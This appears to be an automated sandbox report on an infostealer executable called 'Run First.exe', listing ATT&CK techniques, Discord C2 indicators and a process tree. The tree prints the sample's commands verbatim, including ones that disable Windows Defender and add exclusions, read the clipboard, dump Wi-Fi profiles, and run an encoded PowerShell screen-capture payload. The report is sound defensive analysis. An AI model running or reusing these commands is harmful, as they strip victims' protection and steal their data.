55ffb2cd72353dfa5160e68ffd25630c8ebd2344bf020a38f727a231f1b1ee43

Analysis

max time kernel
34s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-01-2025 01:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Run First.exe
Size

5.8MB
MD5

36c4cf5647aa542693b1cc76039d0d92
SHA1

6db822e2a79a4e96b4fe78c53515808bdd040b3f
SHA256

55ffb2cd72353dfa5160e68ffd25630c8ebd2344bf020a38f727a231f1b1ee43
SHA512

94b039764acb80b8aef2dbb7b8a8946c882511807ed2dbd3297b29849f93106f8e6e3f1b3c7844ed20c5cf6b88e8c4a81f08a1828ed2db9ccb6b4b8a14dba7b5
SSDEEP

98304:Jv62T17VIn+ysDT2mCUpJM0I46f//GHqsKPmyoUYVzOPzdqoNMYrPwGRR6ntZkeJ:JCMFVQ+ysDBPI4sWHqVcUzAoNfoGCntd

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
968	powershell.exe
2552	powershell.exe
1268	powershell.exe
3752	powershell.exe
3916	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Run First.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2472	cmd.exe
3296	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4100	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe
1156	Run First.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	discord.com
30	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1836	tasklist.exe
2868	tasklist.exe
4228	tasklist.exe
4512	tasklist.exe
3284	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023c8d-21.dat	upx
behavioral1/memory/1156-24-0x00007FFEB0E30000-0x00007FFEB1295000-memory.dmp	upx
behavioral1/files/0x0007000000023c80-27.dat	upx
behavioral1/files/0x0007000000023c8b-30.dat	upx
behavioral1/files/0x0007000000023c87-48.dat	upx
behavioral1/files/0x0007000000023c86-47.dat	upx
behavioral1/files/0x0007000000023c85-46.dat	upx
behavioral1/files/0x0007000000023c84-45.dat	upx
behavioral1/files/0x0007000000023c83-44.dat	upx
behavioral1/memory/1156-43-0x00007FFEC7FB0000-0x00007FFEC7FBF000-memory.dmp	upx
behavioral1/files/0x0007000000023c82-42.dat	upx
behavioral1/files/0x0007000000023c81-41.dat	upx
behavioral1/files/0x0007000000023c7f-40.dat	upx
behavioral1/files/0x0007000000023c92-39.dat	upx
behavioral1/files/0x0007000000023c91-38.dat	upx
behavioral1/files/0x0007000000023c90-37.dat	upx
behavioral1/files/0x0007000000023c8c-34.dat	upx
behavioral1/files/0x0007000000023c8a-33.dat	upx
behavioral1/memory/1156-31-0x00007FFEC0790000-0x00007FFEC07B4000-memory.dmp	upx
behavioral1/memory/1156-54-0x00007FFEC0690000-0x00007FFEC06BC000-memory.dmp	upx
behavioral1/memory/1156-56-0x00007FFEC6350000-0x00007FFEC6369000-memory.dmp	upx
behavioral1/memory/1156-58-0x00007FFEC5220000-0x00007FFEC523E000-memory.dmp	upx
behavioral1/memory/1156-60-0x00007FFEB0CC0000-0x00007FFEB0E2D000-memory.dmp	upx
behavioral1/memory/1156-62-0x00007FFEC2490000-0x00007FFEC24A9000-memory.dmp	upx
behavioral1/memory/1156-64-0x00007FFEC6420000-0x00007FFEC642D000-memory.dmp	upx
behavioral1/memory/1156-70-0x00007FFEBFFF0000-0x00007FFEC001E000-memory.dmp	upx
behavioral1/memory/1156-71-0x00007FFEB05F0000-0x00007FFEB0967000-memory.dmp	upx
behavioral1/memory/1156-73-0x00007FFEBFF30000-0x00007FFEBFFE7000-memory.dmp	upx
behavioral1/memory/1156-69-0x00007FFEB0E30000-0x00007FFEB1295000-memory.dmp	upx
behavioral1/memory/1156-78-0x00007FFEC1EC0000-0x00007FFEC1ECD000-memory.dmp	upx
behavioral1/memory/1156-81-0x00007FFEB04D0000-0x00007FFEB05E8000-memory.dmp	upx
behavioral1/memory/1156-80-0x00007FFEC0690000-0x00007FFEC06BC000-memory.dmp	upx
behavioral1/memory/1156-76-0x00007FFEBFCD0000-0x00007FFEBFCE4000-memory.dmp	upx
behavioral1/memory/1156-75-0x00007FFEC0790000-0x00007FFEC07B4000-memory.dmp	upx
behavioral1/memory/1156-106-0x00007FFEC6350000-0x00007FFEC6369000-memory.dmp	upx
behavioral1/memory/1156-119-0x00007FFEC5220000-0x00007FFEC523E000-memory.dmp	upx
behavioral1/memory/1156-146-0x00007FFEB0CC0000-0x00007FFEB0E2D000-memory.dmp	upx
behavioral1/memory/1156-188-0x00007FFEC2490000-0x00007FFEC24A9000-memory.dmp	upx
behavioral1/memory/1156-226-0x00007FFEBFFF0000-0x00007FFEC001E000-memory.dmp	upx
behavioral1/memory/1156-227-0x00007FFEB05F0000-0x00007FFEB0967000-memory.dmp	upx
behavioral1/memory/1156-243-0x00007FFEBFF30000-0x00007FFEBFFE7000-memory.dmp	upx
behavioral1/memory/1156-269-0x00007FFEC5220000-0x00007FFEC523E000-memory.dmp	upx
behavioral1/memory/1156-270-0x00007FFEB0CC0000-0x00007FFEB0E2D000-memory.dmp	upx
behavioral1/memory/1156-265-0x00007FFEC0790000-0x00007FFEC07B4000-memory.dmp	upx
behavioral1/memory/1156-264-0x00007FFEB0E30000-0x00007FFEB1295000-memory.dmp	upx
behavioral1/memory/1156-295-0x00007FFEC0790000-0x00007FFEC07B4000-memory.dmp	upx
behavioral1/memory/1156-308-0x00007FFEB04D0000-0x00007FFEB05E8000-memory.dmp	upx
behavioral1/memory/1156-307-0x00007FFEC1EC0000-0x00007FFEC1ECD000-memory.dmp	upx
behavioral1/memory/1156-306-0x00007FFEBFCD0000-0x00007FFEBFCE4000-memory.dmp	upx
behavioral1/memory/1156-305-0x00007FFEB0E30000-0x00007FFEB1295000-memory.dmp	upx
behavioral1/memory/1156-304-0x00007FFEB05F0000-0x00007FFEB0967000-memory.dmp	upx
behavioral1/memory/1156-303-0x00007FFEBFFF0000-0x00007FFEC001E000-memory.dmp	upx
behavioral1/memory/1156-302-0x00007FFEC6420000-0x00007FFEC642D000-memory.dmp	upx
behavioral1/memory/1156-301-0x00007FFEC2490000-0x00007FFEC24A9000-memory.dmp	upx
behavioral1/memory/1156-300-0x00007FFEB0CC0000-0x00007FFEB0E2D000-memory.dmp	upx
behavioral1/memory/1156-299-0x00007FFEC5220000-0x00007FFEC523E000-memory.dmp	upx
behavioral1/memory/1156-298-0x00007FFEC6350000-0x00007FFEC6369000-memory.dmp	upx
behavioral1/memory/1156-297-0x00007FFEC0690000-0x00007FFEC06BC000-memory.dmp	upx
behavioral1/memory/1156-296-0x00007FFEBFF30000-0x00007FFEBFFE7000-memory.dmp	upx
behavioral1/memory/1156-294-0x00007FFEC7FB0000-0x00007FFEC7FBF000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4992	cmd.exe
3084	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3192	WMIC.exe
3264	WMIC.exe
3764	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1532	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
968	powershell.exe
3752	powershell.exe
3752	powershell.exe
968	powershell.exe
3916	powershell.exe
3916	powershell.exe
3296	powershell.exe
3296	powershell.exe
740	powershell.exe
740	powershell.exe
3296	powershell.exe
740	powershell.exe
2552	powershell.exe
2552	powershell.exe
4888	powershell.exe
4888	powershell.exe
1268	powershell.exe
1268	powershell.exe
2932	powershell.exe
2932	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1836	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4108	WMIC.exe
Token: SeSecurityPrivilege	4108	WMIC.exe
Token: SeTakeOwnershipPrivilege	4108	WMIC.exe
Token: SeLoadDriverPrivilege	4108	WMIC.exe
Token: SeSystemProfilePrivilege	4108	WMIC.exe
Token: SeSystemtimePrivilege	4108	WMIC.exe
Token: SeProfSingleProcessPrivilege	4108	WMIC.exe
Token: SeIncBasePriorityPrivilege	4108	WMIC.exe
Token: SeCreatePagefilePrivilege	4108	WMIC.exe
Token: SeBackupPrivilege	4108	WMIC.exe
Token: SeRestorePrivilege	4108	WMIC.exe
Token: SeShutdownPrivilege	4108	WMIC.exe
Token: SeDebugPrivilege	4108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4108	WMIC.exe
Token: SeRemoteShutdownPrivilege	4108	WMIC.exe
Token: SeUndockPrivilege	4108	WMIC.exe
Token: SeManageVolumePrivilege	4108	WMIC.exe
Token: 33	4108	WMIC.exe
Token: 34	4108	WMIC.exe
Token: 35	4108	WMIC.exe
Token: 36	4108	WMIC.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	3752	powershell.exe
Token: SeIncreaseQuotaPrivilege	4108	WMIC.exe
Token: SeSecurityPrivilege	4108	WMIC.exe
Token: SeTakeOwnershipPrivilege	4108	WMIC.exe
Token: SeLoadDriverPrivilege	4108	WMIC.exe
Token: SeSystemProfilePrivilege	4108	WMIC.exe
Token: SeSystemtimePrivilege	4108	WMIC.exe
Token: SeProfSingleProcessPrivilege	4108	WMIC.exe
Token: SeIncBasePriorityPrivilege	4108	WMIC.exe
Token: SeCreatePagefilePrivilege	4108	WMIC.exe
Token: SeBackupPrivilege	4108	WMIC.exe
Token: SeRestorePrivilege	4108	WMIC.exe
Token: SeShutdownPrivilege	4108	WMIC.exe
Token: SeDebugPrivilege	4108	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4108	WMIC.exe
Token: SeRemoteShutdownPrivilege	4108	WMIC.exe
Token: SeUndockPrivilege	4108	WMIC.exe
Token: SeManageVolumePrivilege	4108	WMIC.exe
Token: 33	4108	WMIC.exe
Token: 34	4108	WMIC.exe
Token: 35	4108	WMIC.exe
Token: 36	4108	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3192	WMIC.exe
Token: SeSecurityPrivilege	3192	WMIC.exe
Token: SeTakeOwnershipPrivilege	3192	WMIC.exe
Token: SeLoadDriverPrivilege	3192	WMIC.exe
Token: SeSystemProfilePrivilege	3192	WMIC.exe
Token: SeSystemtimePrivilege	3192	WMIC.exe
Token: SeProfSingleProcessPrivilege	3192	WMIC.exe
Token: SeIncBasePriorityPrivilege	3192	WMIC.exe
Token: SeCreatePagefilePrivilege	3192	WMIC.exe
Token: SeBackupPrivilege	3192	WMIC.exe
Token: SeRestorePrivilege	3192	WMIC.exe
Token: SeShutdownPrivilege	3192	WMIC.exe
Token: SeDebugPrivilege	3192	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3192	WMIC.exe
Token: SeRemoteShutdownPrivilege	3192	WMIC.exe
Token: SeUndockPrivilege	3192	WMIC.exe
Token: SeManageVolumePrivilege	3192	WMIC.exe
Token: 33	3192	WMIC.exe
Token: 34	3192	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1436 wrote to memory of 1156	1436	Run First.exe	84
PID 1436 wrote to memory of 1156	1436	Run First.exe	84
PID 1156 wrote to memory of 2404	1156	Run First.exe	85
PID 1156 wrote to memory of 2404	1156	Run First.exe	85
PID 1156 wrote to memory of 4484	1156	Run First.exe	86
PID 1156 wrote to memory of 4484	1156	Run First.exe	86
PID 1156 wrote to memory of 2388	1156	Run First.exe	89
PID 1156 wrote to memory of 2388	1156	Run First.exe	89
PID 1156 wrote to memory of 4400	1156	Run First.exe	91
PID 1156 wrote to memory of 4400	1156	Run First.exe	91
PID 2388 wrote to memory of 1836	2388	cmd.exe	93
PID 2388 wrote to memory of 1836	2388	cmd.exe	93
PID 4400 wrote to memory of 4108	4400	cmd.exe	94
PID 4400 wrote to memory of 4108	4400	cmd.exe	94
PID 4484 wrote to memory of 968	4484	cmd.exe	95
PID 4484 wrote to memory of 968	4484	cmd.exe	95
PID 2404 wrote to memory of 3752	2404	cmd.exe	96
PID 2404 wrote to memory of 3752	2404	cmd.exe	96
PID 1156 wrote to memory of 2592	1156	Run First.exe	98
PID 1156 wrote to memory of 2592	1156	Run First.exe	98
PID 2592 wrote to memory of 1756	2592	cmd.exe	100
PID 2592 wrote to memory of 1756	2592	cmd.exe	100
PID 1156 wrote to memory of 1140	1156	Run First.exe	101
PID 1156 wrote to memory of 1140	1156	Run First.exe	101
PID 1140 wrote to memory of 920	1140	cmd.exe	103
PID 1140 wrote to memory of 920	1140	cmd.exe	103
PID 1156 wrote to memory of 3600	1156	Run First.exe	104
PID 1156 wrote to memory of 3600	1156	Run First.exe	104
PID 3600 wrote to memory of 3192	3600	cmd.exe	106
PID 3600 wrote to memory of 3192	3600	cmd.exe	106
PID 1156 wrote to memory of 5100	1156	Run First.exe	107
PID 1156 wrote to memory of 5100	1156	Run First.exe	107
PID 5100 wrote to memory of 3264	5100	cmd.exe	110
PID 5100 wrote to memory of 3264	5100	cmd.exe	110
PID 1156 wrote to memory of 452	1156	Run First.exe	111
PID 1156 wrote to memory of 452	1156	Run First.exe	111
PID 452 wrote to memory of 3916	452	cmd.exe	113
PID 452 wrote to memory of 3916	452	cmd.exe	113
PID 1156 wrote to memory of 4428	1156	Run First.exe	114
PID 1156 wrote to memory of 4428	1156	Run First.exe	114
PID 1156 wrote to memory of 5020	1156	Run First.exe	115
PID 1156 wrote to memory of 5020	1156	Run First.exe	115
PID 4428 wrote to memory of 2868	4428	cmd.exe	118
PID 4428 wrote to memory of 2868	4428	cmd.exe	118
PID 1156 wrote to memory of 1976	1156	Run First.exe	119
PID 1156 wrote to memory of 1976	1156	Run First.exe	119
PID 1156 wrote to memory of 2472	1156	Run First.exe	120
PID 1156 wrote to memory of 2472	1156	Run First.exe	120
PID 5020 wrote to memory of 4228	5020	cmd.exe	121
PID 5020 wrote to memory of 4228	5020	cmd.exe	121
PID 1156 wrote to memory of 1500	1156	Run First.exe	123
PID 1156 wrote to memory of 1500	1156	Run First.exe	123
PID 1156 wrote to memory of 3216	1156	Run First.exe	126
PID 1156 wrote to memory of 3216	1156	Run First.exe	126
PID 1156 wrote to memory of 4992	1156	Run First.exe	127
PID 1156 wrote to memory of 4992	1156	Run First.exe	127
PID 1156 wrote to memory of 2336	1156	Run First.exe	130
PID 1156 wrote to memory of 2336	1156	Run First.exe	130
PID 1156 wrote to memory of 4100	1156	Run First.exe	132
PID 1156 wrote to memory of 4100	1156	Run First.exe	132
PID 1156 wrote to memory of 5076	1156	Run First.exe	133
PID 1156 wrote to memory of 5076	1156	Run First.exe	133
PID 1500 wrote to memory of 4512	1500	cmd.exe	136
PID 1500 wrote to memory of 4512	1500	cmd.exe	136

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3528	attrib.exe
3076	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Run First.exe
"C:\Users\Admin\AppData\Local\Temp\Run First.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1436
- C:\Users\Admin\AppData\Local\Temp\Run First.exe
  "C:\Users\Admin\AppData\Local\Temp\Run First.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Run First.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Run First.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2388
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1140
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5020
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1976
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3216
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4992
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2336
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4100
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB